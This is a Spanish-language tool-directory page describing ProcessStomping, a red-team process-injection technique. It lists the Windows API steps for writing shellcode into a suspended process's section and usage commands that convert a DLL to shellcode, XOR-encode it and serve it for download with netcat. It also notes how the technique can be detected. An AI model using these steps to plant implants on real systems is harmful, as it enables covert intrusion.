Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ProcessStomping — Una variación de ProcessOverwriting para ejecutar shellcode en la sección de un ejecutable. | Kitploit
Herramientas/GitHubGitHub/naksyn/processstomping
ShellcodePost-ExplotaciónAprendizaje y EducaciónRed TeamingDesarrollo de PayloadsExplotación de Binarios
GitHubnaksyn/processstomping

ProcessStomping

Una variación de ProcessOverwriting para ejecutar shellcode en la sección de un ejecutable.

Ver Repositorio
147274hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ProcessStomping

Una variación de ProcessOverwriting para ejecutar shellcode en una sección de un ejecutable

Twitter

Qué es

Para una explicación más detallada puedes leer mi entrada de blog

Process Stomping es una variación del Process Overwriting de hasherezade y tiene la ventaja de escribir una carga útil de shellcode en una sección objetivo en lugar de escribir toda una carga útil de PE sobre el espacio de direcciones del proceso anfitrión.

Estos son los pasos principales de la técnica ProcessStomping:

  1. CreateProcess - establecer la bandera de creación de proceso a CREATE_SUSPENDED (0x00000004) para suspender el hilo principal del proceso.
  2. WriteProcessMemory - usado para escribir cada shellcode malicioso en la sección del proceso objetivo.
  3. SetThreadContext - usado para apuntar el punto de entrada a una nueva sección de código que ha escrito.
  4. ResumeThread - autoexplicativo.

Como ejemplo de aplicación de la técnica, el PoC puede usarse con sRDI para cargar un beacon dll sobre una sección RWX de un ejecutable. La siguiente imagen describe los pasos involucrados.

immagine

Descargo de responsabilidad

Toda la información y el contenido se proporcionan únicamente con fines educativos. Sigue las instrucciones bajo tu propio riesgo. Ni el autor ni su empleador son responsables de ningún daño directo o consecuente o pérdida que surja de cualquier persona u organización.

Créditos

Este trabajo ha sido posible gracias al conocimiento y las herramientas compartidas por Aleksandra Doniec @hasherezade y Nick Landers.

Uso

Selecciona tu proceso objetivo y modifica las variables globales correspondientes en ProcessStomping.cpp.

Compila el proyecto sRDI asegurándote de que el desplazamiento sea suficiente para saltar sobre tu blob de shellcode sRDI generado y luego actualiza las herramientas sRDI:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Genera una carga útil dll sin cargador reflectante de tu elección y luego genera el blob de shellcode sRDI:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

El blob de shellcode puede luego ser xored con una palabra clave y descargado usando un socket simple

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Entrega el blob xored al establecerse la conexión

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

El blob sRDI se borrará después de la ejecución para eliminar artefactos innecesarios.

Demo

https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50

Advertencias

Para ejecutar exitosamente esta técnica debes seleccionar el proceso objetivo correcto y usar una carga útil dll que no incluya un cargador reflectante definido por el usuario.

Oportunidades de detección

La técnica Process Stomping requiere iniciar el proceso objetivo en un estado suspendido, cambiar el punto de entrada del hilo y luego reanudar el hilo para ejecutar el shellcode inyectado. Estas son operaciones que podrían considerarse sospechosas si se realizan en rápida sucesión y podrían llevar a un mayor escrutinio por parte de algunas soluciones de seguridad.

Descargar herramienta